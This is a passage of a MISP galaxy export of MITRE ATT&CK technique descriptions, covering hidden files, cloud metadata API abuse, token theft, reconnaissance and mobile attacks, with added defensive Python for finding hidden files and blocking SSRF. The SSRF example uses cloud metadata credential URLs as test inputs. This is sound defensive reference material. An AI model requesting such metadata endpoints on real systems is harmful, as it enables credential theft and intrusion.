An adversary may encrypt files stored on a mobile device to prevent the user from accessing them. This may be done in order to extract monetary compensation from a victim in exchange for decryption or a decryption key (ransomware) or to render data permanently inaccessible in cases where the key is not saved or transmitted.

The tag is: misp-galaxy:mitre-attack-pattern="Data Encrypted for Impact - T1471"

Table 5569. Table References

Links

https://attack.mitre.org/techniques/T1471

https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-28.html

Hidden Files and Directories - T1158

To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches (<code>dir /a</code> for Windows and <code>ls -a</code> for Linux and macOS).

Adversaries can use this to their advantage to hide files and folders anywhere on the system for persistence and evading a typical user or system analysis that does not incorporate investigation of hidden files.

Windows

Users can mark specific files as hidden by using the attrib.exe binary: <code>attrib +h filename</code> marks a file or folder as hidden. Similarly, <code>+s</code> marks a file as a system file and <code>+r</code> marks it read-only. Like most Windows binaries, attrib.exe can apply these changes recursively with <code>/S</code> (add <code>/D</code> to process folders as well). The attribute only affects listing; it grants no protection and is cleared with <code>attrib -h</code>.

Linux/Mac

Users can mark specific files as hidden simply by putting a “.” as the first character in the file or folder name (Citation: Sofacy Komplex Trojan) (Citation: Antiquated Mac Malware). Files and folders that start with a period, ‘.’, are by default hidden from view in the Finder application and in standard command-line utilities like “ls”. Users must specifically change settings to have these files viewable. For command line usage, there is typically a flag to see all files (including hidden ones). To view these files in the Finder application, run <code>defaults write com.apple.finder AppleShowAllFiles YES</code> and then relaunch Finder (<code>killall Finder</code>); on macOS 10.12 and later, Cmd+Shift+. toggles the same setting from within Finder.

Mac

Files on macOS can also be marked with the UF_HIDDEN flag (set with <code>chflags hidden</code>, shown by <code>ls -lO</code>), which prevents them from being seen in Finder.app but still allows them to be seen in Terminal.app (Citation: WireLurker). Many applications create these hidden files and folders to store information so that it doesn’t clutter up the user’s workspace. For example, SSH utilities create a .ssh folder that’s hidden and contains the user’s known hosts and keys.
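The three hiding mechanisms above (the leading-dot convention, the BSD UF_HIDDEN flag and the Windows hidden/system attributes) are all visible from the file metadata, so a sweep that ignores how the shell or Finder renders things finds all of them. The following Python is an added example, not code from the cited reports or from MISP: it walks a directory tree and reports every entry that is hidden, together with the reason. The fixture directory it builds is constructed for the example; on Linux only the dotfile rule can fire, since st_flags and st_file_attributes exist only on BSD/macOS and Windows respectively.

```python
import os
import stat
import tempfile
from pathlib import Path


def hidden_reasons(path):
    """Return the list of reasons this path counts as hidden (empty if it is not)."""
    p = Path(path)
    reasons = []
    if p.name.startswith("."):
        reasons.append("dotfile")  # Linux/macOS convention honoured by ls and Finder
    st = p.lstat()  # lstat: do not follow symlinks, the link itself is what is hidden
    # macOS/BSD: `chflags hidden` sets UF_HIDDEN in st_flags (absent on Linux/Windows).
    if getattr(st, "st_flags", 0) & getattr(stat, "UF_HIDDEN", 0):
        reasons.append("UF_HIDDEN")
    # Windows: `attrib +h` sets FILE_ATTRIBUTE_HIDDEN, `attrib +s` FILE_ATTRIBUTE_SYSTEM.
    attrs = getattr(st, "st_file_attributes", 0)
    if attrs & getattr(stat, "FILE_ATTRIBUTE_HIDDEN", 0):
        reasons.append("FILE_ATTRIBUTE_HIDDEN")
    if attrs & getattr(stat, "FILE_ATTRIBUTE_SYSTEM", 0):
        reasons.append("FILE_ATTRIBUTE_SYSTEM")
    return reasons


def find_hidden(root):
    """Map of path (relative to root) -> reasons, for every hidden file or directory."""
    found = {}
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames + filenames:
            full = os.path.join(dirpath, name)
            reasons = hidden_reasons(full)
            if reasons:
                found[os.path.relpath(full, root)] = reasons
    return found


def demo():
    """Constructed fixture: a dotfile, a visible file and a hidden directory with content."""
    with tempfile.TemporaryDirectory() as d:
        Path(d, ".secret").write_text("x")
        Path(d, "visible.txt").write_text("y")
        Path(d, ".cache").mkdir()
        Path(d, ".cache", "payload").write_text("z")
        return find_hidden(d)


if __name__ == "__main__":
    for rel, why in sorted(demo().items()):
        print(rel, why)
```

Note that `payload` inside `.cache` is not reported on its own: it is hidden by containment, not by its own metadata, so a sweep that stops at hidden directories misses it. Recursing into them, as `os.walk` does here, is the point.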

The tag is: misp-galaxy:mitre-attack-pattern="Hidden Files and Directories - T1158"

Table 5570. Table References

Links

https://attack.mitre.org/techniques/T1158

https://blog.malwarebytes.com/threat-analysis/2017/01/new-mac-backdoor-using-antiquated-code/

https://researchcenter.paloaltonetworks.com/2016/09/unit42-sofacys-komplex-os-x-trojan/

https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-wirelurker.pdf

Gather Victim Org Information - T1591

Adversaries may gather information about the victim’s organization that can be used during targeting. Information about an organization may include a variety of details, including the names of divisions/departments, specifics of business operations, as well as the roles and responsibilities of key employees.

Adversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about an organization may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: ThreatPost Broadvoice Leak)(Citation: SEC EDGAR Search) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Phishing](https://attack.mitre.org/techniques/T1566) or [Trusted Relationship](https://attack.mitre.org/techniques/T1199)).

The tag is: misp-galaxy:mitre-attack-pattern="Gather Victim Org Information - T1591"

Table 5571. Table References

Links

https://attack.mitre.org/techniques/T1591

https://threatpost.com/broadvoice-leaks-350m-records-voicemail-transcripts/160158/

https://www.sec.gov/edgar/search-and-access

Cloud Storage Object Discovery - T1619

Adversaries may enumerate objects in cloud storage infrastructure. Adversaries may use this information during automated discovery to shape follow-on behaviors, including requesting all or specific objects from cloud storage. Similar to [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) on a local host, after identifying available storage services (i.e. [Cloud Infrastructure Discovery](https://attack.mitre.org/techniques/T1580)) adversaries may access the contents/objects stored in cloud infrastructure.

Cloud service providers offer APIs allowing users to enumerate objects stored within cloud storage. Examples include ListObjectsV2 in AWS(Citation: ListObjectsV2) and List Blobs in Azure.(Citation: List Blobs) Both calls page through results (ListObjectsV2 returns at most 1,000 keys per request together with a ContinuationToken), so a full enumeration of a large bucket appears as a burst of sequential list calls from one principal. Note that AWS CloudTrail records ListObjectsV2 only when S3 data events are enabled for the bucket or trail; management events alone will not show it.

The tag is: misp-galaxy:mitre-attack-pattern="Cloud Storage Object Discovery - T1619"

Table 5572. Table References

Links

https://attack.mitre.org/techniques/T1619

https://docs.aws.amazon.com/AmazonS3/latest/API/API_ListObjectsV2.html

https://docs.microsoft.com/en-us/rest/api/storageservices/list-blobs

System Network Configuration Discovery - T1422

Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of operating systems they access or through information discovery of remote systems.

On Android, details of onboard network interfaces are accessible to apps through the java.net.NetworkInterface class.(Citation: NetworkInterface) Previously, the Android TelephonyManager class could be used to gather telephony-related device identifiers such as the IMSI, IMEI, and phone number. Starting with Android 10, however, only preloaded, carrier, default SMS, or device and profile owner applications can access these identifiers.(Citation: TelephonyManager)

On iOS, gathering network configuration information is not possible without root access.

Adversaries may use the information from [System Network Configuration Discovery](https://attack.mitre.org/techniques/T1422) during automated discovery to shape follow-on behaviors, including determining certain access within the target network and what actions to do next.

The tag is: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1422"

Table 5573. Table References

Links

https://attack.mitre.org/techniques/T1422

https://developer.android.com/reference/android/telephony/TelephonyManager.html

https://developer.android.com/reference/java/net/NetworkInterface.html

Cloud Instance Metadata API - T1522

Adversaries may attempt to access the Cloud Instance Metadata API to collect credentials and other sensitive data.

Most cloud service providers support a Cloud Instance Metadata API which is a service provided to running virtual instances that allows applications to access information about the running virtual instance. Available information generally includes name, security group, and additional metadata including sensitive data such as credentials and UserData scripts that may contain additional secrets. The Instance Metadata API is provided as a convenience to assist in managing applications and is accessible by anyone who can access the instance.(Citation: AWS Instance Metadata API)

If adversaries have a presence on the running virtual instance, they may query the Instance Metadata API directly to identify credentials that grant access to additional resources. Additionally, attackers may exploit a Server-Side Request Forgery (SSRF) vulnerability in a public facing web proxy that allows the attacker to gain access to the sensitive information via a request to the Instance Metadata API.(Citation: RedLock Instance Metadata API 2018)

The de facto standard across cloud service providers is to host the Instance Metadata API at <code>http[:]//169.254.169.254</code>; AWS additionally serves it on the IPv6 address fd00:ec2::254, and GCP also answers by name at metadata.google.internal. Newer metadata services raise the bar for SSRF: AWS IMDSv2 requires a session token obtained with a PUT request (with a default response hop limit of 1), while GCP and Azure require a custom request header (Metadata-Flavor: Google and Metadata: true respectively), so a GET-only SSRF primitive that cannot set methods or headers fails against them. Enforcing IMDSv2 and keeping the hop limit at 1 is the corresponding hardening step on AWS.
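The SSRF path described above works because the proxy forwards whatever destination the client supplies. The following Python is an added example (not MISP or ATT&CK code) of the target validation a web proxy should perform before fetching a client-supplied URL: it rejects non-HTTP schemes, the well-known metadata hostnames and addresses, and anything that resolves to loopback, link-local or private space, including IPv4-mapped IPv6 forms. The URLs in the demonstration are constructed and use IP literals so that no DNS lookup is needed; the resolver is injectable so the same function can be exercised offline.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

# Well-known metadata endpoints: AWS, Azure and GCP all use 169.254.169.254,
# AWS also serves IMDS on fd00:ec2::254, and GCP additionally answers by name.
METADATA_HOSTS = {"metadata.google.internal", "metadata"}
METADATA_NETS = [ipaddress.ip_network("169.254.169.254/32"),
                 ipaddress.ip_network("fd00:ec2::254/128")]


def is_forbidden_address(ip):
    """True for any address a public-facing proxy must never connect to."""
    mapped = getattr(ip, "ipv4_mapped", None)  # ::ffff:a.b.c.d hides an IPv4 target
    if mapped is not None:
        ip = mapped
    return (ip.is_private or ip.is_loopback or ip.is_link_local or ip.is_multicast
            or ip.is_reserved or ip.is_unspecified
            or any(ip in net for net in METADATA_NETS))


def validate_target(url, resolver=socket.getaddrinfo):
    """Return (ok, reason). Resolves hostnames so the check applies to the real address."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        return False, "scheme not allowed"
    host = parts.hostname
    if not host:
        return False, "no host"
    if host.lower().rstrip(".") in METADATA_HOSTS:
        return False, "metadata hostname"
    try:
        addrs = [ipaddress.ip_address(host)]
    except ValueError:
        try:
            addrs = [ipaddress.ip_address(r[4][0]) for r in resolver(host, None)]
        except (socket.gaierror, ValueError):
            return False, "unresolvable host"
    if not addrs:
        return False, "no addresses"
    for ip in addrs:
        if is_forbidden_address(ip):
            return False, f"resolves to forbidden address {ip}"
    return True, "ok"


def vulnerable_proxy_target(url):
    """The anti-pattern: forward whatever the client asked for."""
    return url


def hardened_proxy_target(url, resolver=socket.getaddrinfo):
    """Raise instead of forwarding when the destination is not allowed."""
    ok, reason = validate_target(url, resolver)
    if not ok:
        raise ValueError(f"refusing {url}: {reason}")
    return url


if __name__ == "__main__":
    # Constructed inputs; 93.184.216.34 stands in for an arbitrary public address.
    for u in ("http://169.254.169.254/latest/meta-data/iam/security-credentials/",
              "http://[fd00:ec2::254]/latest/meta-data/",
              "http://metadata.google.internal/computeMetadata/v1/",
              "http://93.184.216.34/"):
        print(u, validate_target(u))
```

Two details matter beyond the check itself: connect to the address that was validated rather than re-resolving the name (otherwise a rebinding DNS answer slips through), and do not follow redirects automatically, since each hop has to pass the same validation.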

The tag is: misp-galaxy:mitre-attack-pattern="Cloud Instance Metadata API - T1522"

Table 5574. Table References

Links

https://attack.mitre.org/techniques/T1522

https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html

https://redlock.io/blog/instance-metadata-api-a-modern-day-trojan-horse

Identify analyst level gaps - T1233

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1233).

Analysts identify gap areas that generate a compelling need to generate a Key Intelligence Topic (KIT) or Key Intelligence Question (KIQ). (Citation: BrighthubGapAnalysis) (Citation: ICD115) (Citation: JP2-01)

The tag is: misp-galaxy:mitre-attack-pattern="Identify analyst level gaps - T1233"

Table 5575. Table References

Links

https://attack.mitre.org/techniques/T1233

Generate analyst intelligence requirements - T1234

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1234).

Analysts may receive Key Intelligence Topics (KITs) and Key Intelligence Questions (KIQs) from leadership or key decision makers and generate intelligence requirements to articulate intricacies of information required on a topic or question. (Citation: Herring1999)

The tag is: misp-galaxy:mitre-attack-pattern="Generate analyst intelligence requirements - T1234"

Table 5576. Table References

Links

https://attack.mitre.org/techniques/T1234

Command and Scripting Interpreter - T1623

Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, Android is a UNIX-like OS and includes a basic [Unix Shell](https://attack.mitre.org/techniques/T1623/001) that can be accessed via the Android Debug Bridge (ADB) or Java’s Runtime package.

Adversaries may abuse these technologies in various ways as a means of executing arbitrary commands. Commands and scripts can be embedded in [Initial Access](https://attack.mitre.org/tactics/TA0027) payloads delivered to victims as lure documents or as secondary payloads downloaded from an existing C2. Adversaries may also execute commands through interactive terminals/shells.

The tag is: misp-galaxy:mitre-attack-pattern="Command and Scripting Interpreter - T1623"

Table 5577. Table References

Links

https://attack.mitre.org/techniques/T1623

https://partner.samsungknox.com/mtd

Identify security defensive capabilities - T1263

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1263).

Security defensive capabilities are designed to stop or limit unauthorized network traffic or other types of accesses. (Citation: OSFingerprinting2014) (Citation: NMAP WAF NSE)

The tag is: misp-galaxy:mitre-attack-pattern="Identify security defensive capabilities - T1263"

Table 5578. Table References

Links

https://attack.mitre.org/techniques/T1263

Use multiple DNS infrastructures - T1327

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1327).

A technique similar to Dynamic DNS, with the exception that the multiple DNS infrastructures used are likely to have WHOIS records. (Citation: KrebsStLouisFed)

The tag is: misp-galaxy:mitre-attack-pattern="Use multiple DNS infrastructures - T1327"

Table 5579. Table References

Links

https://attack.mitre.org/techniques/T1327

Analyze application security posture - T1293

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1293).

An adversary can probe a victim’s network to determine configurations. The configurations may provide opportunities to route traffic through the network in an undetected or less detectable way. (Citation: Li2014ExploitKits) (Citation: RecurlyGHOST)

The tag is: misp-galaxy:mitre-attack-pattern="Analyze application security posture - T1293"

Table 5580. Table References

Links

https://attack.mitre.org/techniques/T1293

Exfiltration Over C2 Channel - T1646

Adversaries may steal data by exfiltrating it over an existing command and control channel. Stolen data is encoded into the normal communications channel using the same protocol as command and control communications.

The tag is: misp-galaxy:mitre-attack-pattern="Exfiltration Over C2 Channel - T1646"

Table 5581. Table References

Links

https://attack.mitre.org/techniques/T1646

https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-29.html

Endpoint Denial of Service - T1642

Adversaries may perform Endpoint Denial of Service (DoS) attacks to degrade or block the availability of services to users.

On Android versions prior to 7, apps can abuse Device Administrator access to reset the device lock passcode, preventing the user from unlocking the device. After Android 7, only device or profile owners (e.g. MDMs) can reset the device’s passcode.(Citation: Android resetPassword)

On iOS devices, this technique does not work because mobile device management servers can only remove the screen lock passcode; they cannot set a new passcode. However, on jailbroken devices, malware has been discovered that can lock the user out of the device.(Citation: Xiao-KeyRaider)

The tag is: misp-galaxy:mitre-attack-pattern="Endpoint Denial of Service - T1642"

Table 5582. Table References

Links

http://researchcenter.paloaltonetworks.com/2015/08/keyraider-ios-malware-steals-over-225000-apple-accounts-to-create-free-app-utopia/

https://attack.mitre.org/techniques/T1642

https://developer.android.com/reference/android/app/admin/DevicePolicyManager.html#resetPassword(java.lang.String,%20int)

Malicious Software Development Tools - T1462

As demonstrated by the XcodeGhost attack (Citation: PaloAlto-XcodeGhost1), app developers could be provided with modified versions of software development tools (e.g. compilers) that automatically inject malicious or exploitable code into applications.

Detection: Enterprises could deploy integrity checking software to the computers that they use to develop code to detect presence of unauthorized, modified software development tools.

Platforms: Android, iOS

The tag is: misp-galaxy:mitre-attack-pattern="Malicious Software Development Tools - T1462"

Malicious Software Development Tools - T1462 has relationships with:

  • revoked-by: misp-galaxy:mitre-attack-pattern="Supply Chain Compromise - T1474" with estimative-language:likelihood-probability="almost-certain"

Table 5583. Table References

Links

https://attack.mitre.org/techniques/T1462

Identify technology usage patterns - T1264

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1264).

Technology usage patterns include identifying if users work offsite, connect remotely, or other possibly less restricted/secured access techniques. (Citation: SANSRemoteAccess)

The tag is: misp-galaxy:mitre-attack-pattern="Identify technology usage patterns - T1264"

Table 5584. Table References

Links

https://attack.mitre.org/techniques/T1264

Generate Fraudulent Advertising Revenue - T1472

An adversary could seek to generate fraudulent advertising revenue from mobile devices, for example by triggering automatic clicks of advertising links without user involvement.

The tag is: misp-galaxy:mitre-attack-pattern="Generate Fraudulent Advertising Revenue - T1472"

Table 5585. Table References

Links

https://attack.mitre.org/techniques/T1472

Identify sensitive personnel information - T1274

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1274).

An adversary may identify sensitive personnel information not typically posted on a social media site, such as address, marital status, financial history, and law enforcement infractions. This could be conducted by searching public records that are frequently available for free or at a low cost online. (Citation: RSA-APTRecon)

The tag is: misp-galaxy:mitre-attack-pattern="Identify sensitive personnel information - T1274"

Table 5586. Table References

Links

https://attack.mitre.org/techniques/T1274

Exploitation of Remote Services - T1428

Adversaries may exploit remote services of enterprise servers, workstations, or other resources to gain unauthorized access to internal systems once inside of a network. Adversaries may exploit remote services by taking advantage of a mobile device’s access to an internal enterprise network through local connectivity or through a Virtual Private Network (VPN). Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. A common goal for post-compromise exploitation of remote services is for lateral movement to enable access to a remote system.

An adversary may need to determine if the remote system is in a vulnerable state, which may be done through [Network Service Scanning](https://attack.mitre.org/techniques/T1423) or other Discovery methods. These look for common, vulnerable software that may be deployed in the network, the lack of certain patches that may indicate vulnerabilities, or security software that may be used to detect or contain remote exploitation. Servers are likely a high value target for lateral movement exploitation, but endpoint systems may also be at risk if they provide an advantage or access to additional resources.

Depending on the permissions level of the vulnerable remote service, an adversary may achieve [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1404) as a result of lateral movement exploitation as well.

The tag is: misp-galaxy:mitre-attack-pattern="Exploitation of Remote Services - T1428"

Table 5587. Table References

Links

https://attack.mitre.org/techniques/T1428

https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-32.html

Identify web defensive services - T1256

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1256).

An adversary can attempt to identify web defensive services such as [CloudFlare](https://www.cloudflare.com), [IPBan](https://github.com/jjxtra/Windows-IP-Ban-Service), and [Snort](https://www.snort.org). This may be done by passively detecting services, like [CloudFlare](https://www.cloudflare.com) routing, or actively, such as by purposefully tripping security defenses. (Citation: NMAP WAF NSE)

The tag is: misp-galaxy:mitre-attack-pattern="Identify web defensive services - T1256"

Table 5588. Table References

Links

https://attack.mitre.org/techniques/T1256

Steal Application Access Token - T1528

Adversaries can steal application access tokens as a means of acquiring credentials to access remote systems and resources.

Application access tokens are used to make authorized API requests on behalf of a user or service and are commonly used as a way to access resources in cloud and container-based applications and software-as-a-service (SaaS).(Citation: Auth0 - Why You Should Always Use Access Tokens to Secure APIs Sept 2019) OAuth is one commonly implemented framework that issues tokens to users for access to systems. Adversaries who steal account API tokens in cloud and containerized environments may be able to access data and perform actions with the permissions of these accounts, which can lead to privilege escalation and further compromise of the environment.

In Kubernetes environments, processes running inside a container communicate with the Kubernetes API server using service account tokens. If a container is compromised, an attacker may be able to steal the container’s token and thereby gain access to Kubernetes API commands.(Citation: Kubernetes Service Accounts)

Token theft can also occur through social engineering, in which case user action may be required to grant access. An application desiring access to cloud-based services or protected APIs can gain entry using OAuth 2.0 through a variety of authorization protocols. An example commonly-used sequence is Microsoft’s Authorization Code Grant flow.(Citation: Microsoft Identity Platform Protocols May 2019)(Citation: Microsoft - OAuth Code Authorization flow - June 2019) An OAuth access token enables a third-party application to interact with resources containing user data in the ways requested by the application without obtaining user credentials.

Adversaries can leverage OAuth authorization by constructing a malicious application designed to be granted access to resources with the target user’s OAuth token.(Citation: Amnesty OAuth Phishing Attacks, August 2019)(Citation: Trend Micro Pawn Storm OAuth 2017) The adversary will need to complete registration of their application with the authorization server, for example Microsoft Identity Platform using Azure Portal, the Visual Studio IDE, the command-line interface, PowerShell, or REST API calls.(Citation: Microsoft - Azure AD App Registration - May 2019) Then, they can send a [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002) to the target user to entice them to grant access to the application. Once the OAuth access token is granted, the application can gain potentially long-term access to features of the user account through [Application Access Token](https://attack.mitre.org/techniques/T1550/001).(Citation: Microsoft - Azure AD Identity Tokens - Aug 2019)

Application access tokens may function within a limited lifetime, limiting how long an adversary can utilize the stolen token. However, in some cases, adversaries can also steal application refresh tokens(Citation: Auth0 Understanding Refresh Tokens), allowing them to obtain new access tokens without prompting the user.

The tag is: misp-galaxy:mitre-attack-pattern="Steal Application Access Token - T1528"

Table 5589. Table References

Links

https://attack.mitre.org/techniques/T1528

https://auth0.com/blog/why-should-use-accesstokens-to-secure-an-api/

https://auth0.com/learn/refresh-tokens/

https://blog.trendmicro.com/trendlabs-security-intelligence/pawn-storm-abuses-open-authentication-advanced-social-engineering-attacks

https://docs.microsoft.com/en-us/azure/active-directory/develop/access-tokens

https://docs.microsoft.com/en-us/azure/active-directory/develop/active-directory-v2-protocols

https://docs.microsoft.com/en-us/azure/active-directory/develop/quickstart-register-app

https://docs.microsoft.com/en-us/azure/active-directory/develop/v2-oauth2-auth-code-flow

https://kubernetes.io/docs/tasks/configure-pod-container/configure-service-account/

https://www.amnesty.org/en/latest/research/2019/08/evolving-phishing-attacks-targeting-journalists-and-human-rights-defenders-from-the-middle-east-and-north-africa/

Gather Victim Host Information - T1592

Adversaries may gather information about the victim’s hosts that can be used during targeting. Information about hosts may include a variety of details, including administrative data (ex: name, assigned IP, functionality, etc.) as well as specifics regarding its configuration (ex: operating system, language, etc.).

Adversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Adversaries may also compromise sites then include malicious content designed to collect host information from visitors.(Citation: ATT ScanBox) Information about hosts may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)). Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195) or [External Remote Services](https://attack.mitre.org/techniques/T1133)).

The tag is: misp-galaxy:mitre-attack-pattern="Gather Victim Host Information - T1592"

Table 5590. Table References

Links

https://attack.mitre.org/techniques/T1592

https://cybersecurity.att.com/blogs/labs-research/scanbox-a-reconnaissance-framework-used-on-watering-hole-attacks

https://threatconnect.com/blog/infrastructure-research-hunting/

Abuse Elevation Control Mechanism - T1626

Adversaries may circumvent mechanisms designed to control elevated privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can gain on a machine. Authorization has to be granted to specific users in order to perform tasks that are designated as higher risk. An adversary can use several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.

The tag is: misp-galaxy:mitre-attack-pattern="Abuse Elevation Control Mechanism - T1626"

Table 5591. Table References

Links

https://attack.mitre.org/techniques/T1626

https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-22.html

Identify people of interest - T1269

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1269).

This is the attempt to identify people of interest, or people with an inherent weakness, for direct or indirect targeting in order to determine an approach to compromise a person or organization. Such targets may include individuals with poor OPSEC practices or those who have a trusted relationship with the intended target. (Citation: RSA-APTRecon) (Citation: Scasny2015)

The tag is: misp-galaxy:mitre-attack-pattern="Identify people of interest - T1269"

Table 5592. Table References

Links

https://attack.mitre.org/techniques/T1269

Data from Local System - T1533

Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to exfiltration.

Access to local system data, which includes information stored by the operating system, often requires escalated privileges. Examples of local system data include authentication tokens, the device keyboard cache, Wi-Fi passwords, and photos. On Android, adversaries may also attempt to access files from external storage which may require additional storage-related permissions.

The tag is: misp-galaxy:mitre-attack-pattern="Data from Local System - T1533"

Table 5593. Table References

Links

https://attack.mitre.org/techniques/T1533

https://pages.nist.gov/mobile-threat-catalogue/stack-threats/STA-41.html

Post compromise tool development - T1353

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1353).

After compromise, an adversary may utilize additional tools to facilitate their end goals. This may include tools to further explore the system, move laterally within a network, exfiltrate data, or destroy data. (Citation: SofacyHits)

The tag is: misp-galaxy:mitre-attack-pattern="Post compromise tool development - T1353"

Table 5594. Table References

Links

https://attack.mitre.org/techniques/T1353

Credentials from Password Store - T1634

Adversaries may search common password storage locations to obtain user credentials. Passwords can be stored in several places on a device, depending on the operating system or application holding the credentials. There are also specific applications that store passwords to make it easier for users to manage and maintain. Once credentials are obtained, they can be used to perform lateral movement and access restricted information.

The tag is: misp-galaxy:mitre-attack-pattern="Credentials from Password Store - T1634"

Table 5595. Table References

Links

https://attack.mitre.org/techniques/T1634

https://pages.nist.gov/mobile-threat-catalogue/authentication-threats/AUT-11.html

Generate Traffic from Victim - T1643

Adversaries may generate outbound traffic from devices. This is typically performed to manipulate external outcomes, such as to achieve carrier billing fraud or to manipulate app store rankings or ratings. Outbound traffic is typically generated as SMS messages or general web traffic, but may take other forms as well.

If done via SMS messages, Android apps must hold the SEND_SMS permission. Additionally, sending an SMS message requires user consent if the recipient is a premium number. Applications cannot send SMS messages on iOS.

The tag is: misp-galaxy:mitre-attack-pattern="Generate Traffic from Victim - T1643"

Table 5596. Table References

Links

https://attack.mitre.org/techniques/T1643

https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-16.html

Build or acquire exploits - T1349

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1349).

An exploit takes advantage of a bug or vulnerability in order to cause unintended or unanticipated behavior to occur on computer hardware or software. The adversary may use or modify existing exploits when those exploits are still relevant to the environment they are trying to compromise. (Citation: NYTStuxnet) (Citation: NationsBuying)

The tag is: misp-galaxy:mitre-attack-pattern="Build or acquire exploits - T1349"

Table 5597. Table References

Links

https://attack.mitre.org/techniques/T1349

https://www.nytimes.com/2011/01/16/world/middleeast/16stuxnet.html

https://www.nytimes.com/2013/07/14/world/europe/nations-buying-as-hackers-sell-computer-flaws.html

Create infected removable media - T1355

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1355).

Use of removable media as part of the Launch phase requires an adversary to determine type, format, and content of the media and associated malware. (Citation: BadUSB)

The tag is: misp-galaxy:mitre-attack-pattern="Create infected removable media - T1355"

Table 5598. Table References

Links

https://attack.mitre.org/techniques/T1355

Steal Application Access Token - T1635

Adversaries can steal user application access tokens as a means of acquiring credentials to access remote systems and resources. This can occur through social engineering or URI hijacking and typically requires user action to grant access, such as through a system “Open With” dialogue.

